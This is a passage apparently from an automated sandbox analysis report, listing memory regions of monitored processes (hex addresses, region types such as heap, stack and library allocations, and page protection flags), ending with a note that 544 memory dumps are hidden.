|
page readonly
|
||
|
7FFAAC590000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC3EC000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAAC690000
|
trusted library allocation
|
page read and write
|
||
|
CD06DEE000
|
stack
|
page read and write
|
||
|
8A506FE000
|
stack
|
page read and write
|
||
|
2262DF44000
|
heap
|
page read and write
|
||
|
25F0E910000
|
heap
|
page read and write
|
||
|
17AE3853000
|
heap
|
page read and write
|
||
|
22614130000
|
heap
|
page read and write
|
||
|
26C490B4000
|
heap
|
page read and write
|
||
|
17AE3849000
|
heap
|
page read and write
|
||
|
17AE381F000
|
heap
|
page read and write
|
||
|
4FC24FE000
|
stack
|
page read and write
|
||
|
26C49580000
|
heap
|
page read and write
|
||
|
25F1153A000
|
trusted library allocation
|
page read and write
|
||
|
26C2F22C000
|
heap
|
page read and write
|
||
|
22613F81000
|
heap
|
page read and write
|
||
|
7FFAAC5B0000
|
trusted library allocation
|
page read and write
|
||
|
22615A44000
|
heap
|
page read and write
|
||
|
25F10902000
|
trusted library allocation
|
page read and write
|
||
|
CD0707E000
|
stack
|
page read and write
|
||
|
A4C84BE000
|
stack
|
page read and write
|
||
|
25F28F39000
|
heap
|
page read and write
|
||
|
4FC28FF000
|
stack
|
page read and write
|
||
|
17AE386D000
|
heap
|
page read and write
|
||
|
26C32CA6000
|
trusted library allocation
|
page read and write
|
||
|
D96FBCD000
|
stack
|
page read and write
|
||
|
7FFAAC6A0000
|
trusted library allocation
|
page read and write
|
||
|
25F0E990000
|
trusted library allocation
|
page read and write
|
||
|
903F7EC000
|
stack
|
page read and write
|
||
|
31FF000
|
stack
|
page read and write
|
||
|
903FB7E000
|
stack
|
page read and write
|
||
|
7FFAAC42C000
|
trusted library allocation
|
page execute and read and write
|
||
|
3D2F000
|
stack
|
page read and write
|
||
|
2262DF73000
|
heap
|
page read and write
|
||
|
7FFAAC560000
|
trusted library allocation
|
page execute and read and write
|
||
|
8A505FD000
|
stack
|
page read and write
|
||
|
26C2F030000
|
heap
|
page read and write
|
||
|
26C491E0000
|
heap
|
page read and write
|
||
|
2262E400000
|
heap
|
page read and write
|
||
|
D96FEFF000
|
unkown
|
page read and write
|
||
|
25F10B23000
|
trusted library allocation
|
page read and write
|
||
|
17AE3842000
|
heap
|
page read and write
|
||
|
26C30BA0000
|
heap
|
page read and write
|
||
|
26C2F430000
|
heap
|
page read and write
|
||
|
A4C7E7E000
|
stack
|
page read and write
|
||
|
1196000
|
heap
|
page read and write
|
||
|
7FFAAC610000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC590000
|
trusted library allocation
|
page read and write
|
||
|
22625A51000
|
trusted library allocation
|
page read and write
|
||
|
8A501C3000
|
stack
|
page read and write
|
||
|
7FFAAC51A000
|
trusted library allocation
|
page read and write
|
||
|
25F10603000
|
trusted library allocation
|
page read and write
|
||
|
25F10B3A000
|
trusted library allocation
|
page read and write
|
||
|
226159C0000
|
heap
|
page execute and read and write
|
||
|
25F0E71F000
|
heap
|
page read and write
|
||
|
2262DF6B000
|
heap
|
page read and write
|
||
|
7FFAAC542000
|
trusted library allocation
|
page read and write
|
||
|
26C30B36000
|
heap
|
page execute and read and write
|
||
|
226159D0000
|
heap
|
page execute and read and write
|
||
|
7FFAAC6C0000
|
trusted library allocation
|
page read and write
|
||
|
2F7F000
|
stack
|
page read and write
|
||
|
26C30AD0000
|
trusted library allocation
|
page read and write
|
||
|
22615E15000
|
trusted library allocation
|
page read and write
|
||
|
1B92B449000
|
heap
|
page read and write
|
||
|
25F0E76B000
|
heap
|
page read and write
|
||
|
3C2E000
|
stack
|
page read and write
|
||
|
7FFAAC380000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC620000
|
trusted library allocation
|
page read and write
|
||
|
22615B5B000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC4D2000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC530000
|
trusted library allocation
|
page execute and read and write
|
||
|
25F11E38000
|
trusted library allocation
|
page read and write
|
||
|
8A509B9000
|
stack
|
page read and write
|
||
|
17AE6107000
|
heap
|
page read and write
|
||
|
25F0E768000
|
heap
|
page read and write
|
||
|
25F12057000
|
trusted library allocation
|
page read and write
|
||
|
17AE56F2000
|
heap
|
page read and write
|
||
|
7FFB1E100000
|
unkown
|
page read and write
|
||
|
7FFAAC3E6000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC6F0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC600000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC6A0000
|
trusted library allocation
|
page read and write
|
||
|
22615BAE000
|
trusted library allocation
|
page read and write
|
||
|
17AE3A65000
|
heap
|
page read and write
|
||
|
8A50C3C000
|
stack
|
page read and write
|
||
|
26C410E2000
|
trusted library allocation
|
page read and write
|
||
|
25F28F16000
|
heap
|
page read and write
|
||
|
7FFAAC372000
|
trusted library allocation
|
page read and write
|
||
|
8A507F9000
|
stack
|
page read and write
|
||
|
7FFAAC416000
|
trusted library allocation
|
page execute and read and write
|
||
|
26C32CA2000
|
trusted library allocation
|
page read and write
|
||
|
25F28E66000
|
heap
|
page read and write
|
||
|
17AE39E0000
|
heap
|
page read and write
|
||
|
25F10B02000
|
trusted library allocation
|
page read and write
|
||
|
26C32BDD000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC480000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAAC500000
|
trusted library allocation
|
page read and write
|
||
|
8A5174E000
|
stack
|
page read and write
|
||
|
26773710000
|
heap
|
page read and write
|
||
|
25F0E7D5000
|
heap
|
page read and write
|
||
|
25F10961000
|
trusted library allocation
|
page read and write
|
||
|
17AE5DAC000
|
heap
|
page read and write
|
||
|
7FFAAC490000
|
trusted library allocation
|
page execute and read and write
|
||
|
25F0E980000
|
heap
|
page readonly
|
||
|
22613D70000
|
heap
|
page read and write
|
||
|
3ABE000
|
stack
|
page read and write
|
||
|
1150000
|
heap
|
page read and write
|
||
|
CD07578000
|
stack
|
page read and write
|
||
|
26C30A80000
|
trusted library allocation
|
page read and write
|
||
|
22615E5E000
|
trusted library allocation
|
page read and write
|
||
|
26C49118000
|
heap
|
page read and write
|
||
|
25F206CA000
|
trusted library allocation
|
page read and write
|
||
|
26C49145000
|
heap
|
page read and write
|
||
|
7FFAAC6B0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC41C000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAAC33D000
|
trusted library allocation
|
page execute and read and write
|
||
|
26C324DD000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC334000
|
trusted library allocation
|
page read and write
|
||
|
CD0717E000
|
stack
|
page read and write
|
||
|
7FFAAC37D000
|
trusted library allocation
|
page execute and read and write
|
||
|
26C30B10000
|
trusted library allocation
|
page read and write
|
||
|
25F0E950000
|
trusted library allocation
|
page read and write
|
||
|
17AE56F4000
|
heap
|
page read and write
|
||
|
7FFAAC620000
|
trusted library allocation
|
page read and write
|
||
|
A4C7BDE000
|
stack
|
page read and write
|
||
|
2262DF66000
|
heap
|
page read and write
|
||
|
7FFAAC570000
|
trusted library allocation
|
page read and write
|
||
|
25F1095A000
|
trusted library allocation
|
page read and write
|
||
|
22613FC9000
|
heap
|
page read and write
|
||
|
25F28CF0000
|
heap
|
page read and write
|
||
|
397D000
|
stack
|
page read and write
|
||
|
D4C000
|
stack
|
page read and write
|
||
|
2262DF51000
|
heap
|
page read and write
|
||
|
25F28EB4000
|
heap
|
page read and write
|
||
|
7FFAAC560000
|
trusted library allocation
|
page read and write
|
||
|
25F0E9E4000
|
heap
|
page read and write
|
||
|
2FBC000
|
stack
|
page read and write
|
||
|
A4C843E000
|
stack
|
page read and write
|
||
|
7FFAAC630000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC52A000
|
trusted library allocation
|
page read and write
|
||
|
1B92B6A0000
|
heap
|
page read and write
|
||
|
7FFAAC340000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC580000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC630000
|
trusted library allocation
|
page read and write
|
||
|
25F0E73F000
|
heap
|
page read and write
|
||
|
CD0777E000
|
stack
|
page read and write
|
||
|
383E000
|
stack
|
page read and write
|
||
|
4FC2CFF000
|
stack
|
page read and write
|
||
|
7FFAAC530000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC450000
|
trusted library allocation
|
page execute and read and write
|
||
|
25F28E80000
|
heap
|
page read and write
|
||
|
17AE383D000
|
heap
|
page read and write
|
||
|
17AE3A60000
|
heap
|
page read and write
|
||
|
7FFAAC540000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAAC5A0000
|
trusted library allocation
|
page read and write
|
||
|
25F10A72000
|
trusted library allocation
|
page read and write
|
||
|
26C4135B000
|
trusted library allocation
|
page read and write
|
||
|
26C30B30000
|
heap
|
page execute and read and write
|
||
|
22615B6B000
|
trusted library allocation
|
page read and write
|
||
|
12A0000
|
heap
|
page read and write
|
||
|
17AE56FA000
|
heap
|
page read and write
|
||
|
7FFAAC600000
|
trusted library allocation
|
page read and write
|
||
|
22615AE4000
|
trusted library allocation
|
page read and write
|
||
|
1B92B6A4000
|
heap
|
page read and write
|
||
|
17AE3820000
|
heap
|
page read and write
|
||
|
CD071FD000
|
stack
|
page read and write
|
||
|
25F0E970000
|
trusted library allocation
|
page read and write
|
||
|
2D5C000
|
stack
|
page read and write
|
||
|
25F103E1000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC550000
|
trusted library allocation
|
page read and write
|
||
|
7FFB1E3A1000
|
unkown
|
page execute read
|
||
|
26C3291E000
|
trusted library allocation
|
page read and write
|
||
|
17AE3A00000
|
heap
|
page read and write
|
||
|
7FFAAC4E1000
|
trusted library allocation
|
page read and write
|
||
|
25F0E9B0000
|
heap
|
page execute and read and write
|
||
|
7FFAAC426000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC456000
|
trusted library allocation
|
page execute and read and write
|
||
|
17AE3A6A000
|
heap
|
page read and write
|
||
|
17AE645A000
|
heap
|
page read and write
|
||
|
17AE3A69000
|
heap
|
page read and write
|
||
|
2262E0A0000
|
heap
|
page read and write
|
||
|
17AE386D000
|
heap
|
page read and write
|
||
|
25F102A4000
|
heap
|
page read and write
|
||
|
22613F40000
|
heap
|
page read and write
|
||
|
25F28F12000
|
heap
|
page read and write
|
||
|
25F28800000
|
heap
|
page execute and read and write
|
||
|
7FFAAC373000
|
trusted library allocation
|
page execute and read and write
|
||
|
7DF4C3640000
|
trusted library allocation
|
page execute and read and write
|
||
|
11C8000
|
heap
|
page read and write
|
||
|
267737F0000
|
heap
|
page read and write
|
||
|
A4C81FE000
|
stack
|
page read and write
|
||
|
7FFAAC550000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAAC38B000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC5D0000
|
trusted library allocation
|
page read and write
|
||
|
26C49143000
|
heap
|
page read and write
|
||
|
267739C0000
|
heap
|
page read and write
|
||
|
7FFAAC560000
|
trusted library allocation
|
page read and write
|
||
|
8A50B3E000
|
stack
|
page read and write
|
||
|
22614038000
|
heap
|
page read and write
|
||
|
25F11A0E000
|
trusted library allocation
|
page read and write
|
||
|
CD06DA3000
|
stack
|
page read and write
|
||
|
7FFAAC630000
|
trusted library allocation
|
page read and write
|
||
|
26C2F228000
|
heap
|
page read and write
|
||
|
25F10280000
|
heap
|
page execute and read and write
|
||
|
26C49130000
|
heap
|
page read and write
|
||
|
7FFB1E3C0000
|
unkown
|
page read and write
|
||
|
26C2F130000
|
heap
|
page read and write
|
||
|
11CD000
|
heap
|
page read and write
|
||
|
DB0000
|
heap
|
page read and write
|
||
|
22615B68000
|
trusted library allocation
|
page read and write
|
||
|
26C31020000
|
heap
|
page execute and read and write
|
||
|
17AE386D000
|
heap
|
page read and write
|
||
|
26C2F1A7000
|
heap
|
page read and write
|
||
|
17AE384D000
|
heap
|
page read and write
|
||
|
7FFAAC590000
|
trusted library allocation
|
page read and write
|
||
|
26C3129E000
|
trusted library allocation
|
page read and write
|
||
|
8A50BBC000
|
stack
|
page read and write
|
||
|
7FFAAC430000
|
trusted library allocation
|
page execute and read and write
|
||
|
CD0737F000
|
stack
|
page read and write
|
||
|
26C2F170000
|
heap
|
page read and write
|
||
|
393F000
|
stack
|
page read and write
|
||
|
26C31C9E000
|
trusted library allocation
|
page read and write
|
||
|
25F1091C000
|
trusted library allocation
|
page read and write
|
||
|
2262DF93000
|
heap
|
page read and write
|
||
|
CD077FC000
|
stack
|
page read and write
|
||
|
26C328D3000
|
trusted library allocation
|
page read and write
|
||
|
25F102A0000
|
heap
|
page read and write
|
||
|
26C49310000
|
heap
|
page execute and read and write
|
||
|
26C41225000
|
trusted library allocation
|
page read and write
|
||
|
26C49200000
|
heap
|
page read and write
|
||
|
7FFAAC38B000
|
trusted library allocation
|
page execute and read and write
|
||
|
17AE3898000
|
heap
|
page read and write
|
||
|
11B7000
|
heap
|
page read and write
|
||
|
7FFAAC530000
|
trusted library allocation
|
page execute and read and write
|
||
|
25F101C2000
|
trusted library allocation
|
page read and write
|
||
|
3BBB000
|
stack
|
page read and write
|
||
|
7FFAAC690000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC640000
|
trusted library allocation
|
page read and write
|
||
|
25F28E40000
|
heap
|
page read and write
|
||
|
226159A0000
|
heap
|
page execute and read and write
|
||
|
CD081CE000
|
stack
|
page read and write
|
||
|
25F102B5000
|
heap
|
page read and write
|
||
|
7FFB1E3C2000
|
unkown
|
page readonly
|
||
|
25F1205B000
|
trusted library allocation
|
page read and write
|
||
|
25F20665000
|
trusted library allocation
|
page read and write
|
||
|
25F28C50000
|
heap
|
page read and write
|
||
|
10FC000
|
stack
|
page read and write
|
||
|
25F0E6E9000
|
heap
|
page read and write
|
||
|
8A5057F000
|
stack
|
page read and write
|
||
|
26C41071000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC6E0000
|
trusted library allocation
|
page read and write
|
||
|
22615A4A000
|
heap
|
page read and write
|
||
|
17AE56F2000
|
heap
|
page read and write
|
||
|
7FFAAC4D0000
|
trusted library allocation
|
page read and write
|
||
|
26C30A90000
|
heap
|
page readonly
|
||
|
D96FFFF000
|
stack
|
page read and write
|
||
|
7FFAAC363000
|
trusted library allocation
|
page execute and read and write
|
||
|
17AE5DAE000
|
heap
|
page read and write
|
||
|
A4C7B53000
|
stack
|
page read and write
|
||
|
7FFAAC660000
|
trusted library allocation
|
page read and write
|
||
|
1B92B610000
|
heap
|
page read and write
|
||
|
335F000
|
stack
|
page read and write
|
||
|
7FFAAC3BC000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAAC650000
|
trusted library allocation
|
page read and write
|
||
|
22613F54000
|
heap
|
page read and write
|
||
|
26C2F110000
|
heap
|
page read and write
|
||
|
A4C817E000
|
stack
|
page read and write
|
||
|
22613F8A000
|
heap
|
page read and write
|
||
|
7FFAAC520000
|
trusted library allocation
|
page execute and read and write
|
||
|
4FC27FE000
|
stack
|
page read and write
|
||
|
25F0E6D0000
|
heap
|
page read and write
|
||
|
26773AC4000
|
heap
|
page read and write
|
||
|
2D70000
|
heap
|
page read and write
|
||
|
22614135000
|
heap
|
page read and write
|
||
|
17AE3855000
|
heap
|
page read and write
|
||
|
7FFAAC420000
|
trusted library allocation
|
page read and write
|
||
|
26C2F43E000
|
heap
|
page read and write
|
||
|
7FFAAC364000
|
trusted library allocation
|
page read and write
|
||
|
26C2F1EE000
|
heap
|
page read and write
|
||
|
7FFAAC5C0000
|
trusted library allocation
|
page read and write
|
||
|
25F28830000
|
heap
|
page read and write
|
||
|
25F28ED0000
|
heap
|
page read and write
|
||
|
26C2F1BF000
|
heap
|
page read and write
|
||
|
7FFB1E100000
|
unkown
|
page read and write
|
||
|
7FFAAC502000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC580000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC650000
|
trusted library allocation
|
page read and write
|
||
|
1390000
|
heap
|
page read and write
|
||
|
25F103D9000
|
heap
|
page read and write
|
||
|
25F11DC1000
|
trusted library allocation
|
page read and write
|
||
|
7FFB1E3C5000
|
unkown
|
page readonly
|
||
|
7FFAAC600000
|
trusted library allocation
|
page read and write
|
||
|
25F10A92000
|
trusted library allocation
|
page read and write
|
||
|
A4C7F7E000
|
stack
|
page read and write
|
||
|
7FFAAC610000
|
trusted library allocation
|
page read and write
|
||
|
17AE3850000
|
heap
|
page read and write
|
||
|
26773810000
|
heap
|
page read and write
|
||
|
7FFAAC570000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC5E0000
|
trusted library allocation
|
page read and write
|
||
|
CD074F9000
|
stack
|
page read and write
|
||
|
17AE56F0000
|
heap
|
page read and write
|
||
|
22625ABF000
|
trusted library allocation
|
page read and write
|
||
|
3200000
|
heap
|
page read and write
|
||
|
17AE3856000
|
heap
|
page read and write
|
||
|
25F10190000
|
trusted library allocation
|
page read and write
|
||
|
1380000
|
heap
|
page read and write
|
||
|
3E6E000
|
stack
|
page read and write
|
||
|
22615A40000
|
heap
|
page read and write
|
||
|
8A5168D000
|
stack
|
page read and write
|
||
|
22615F40000
|
trusted library allocation
|
page read and write
|
||
|
25F203E1000
|
trusted library allocation
|
page read and write
|
||
|
7FFB1E105000
|
unkown
|
page readonly
|
||
|
25F10AFE000
|
trusted library allocation
|
page read and write
|
||
|
25F0E8B0000
|
heap
|
page read and write
|
||
|
22615F32000
|
trusted library allocation
|
page read and write
|
||
|
26C328FE000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC446000
|
trusted library allocation
|
page execute and read and write
|
||
|
17AE3856000
|
heap
|
page read and write
|
||
|
7FFAAC5B0000
|
trusted library allocation
|
page read and write
|
||
|
26C49360000
|
heap
|
page read and write
|
||
|
7FFAAC5E0000
|
trusted library allocation
|
page read and write
|
||
|
22613FA2000
|
heap
|
page read and write
|
There are 544 hidden memdumps, click here to show them.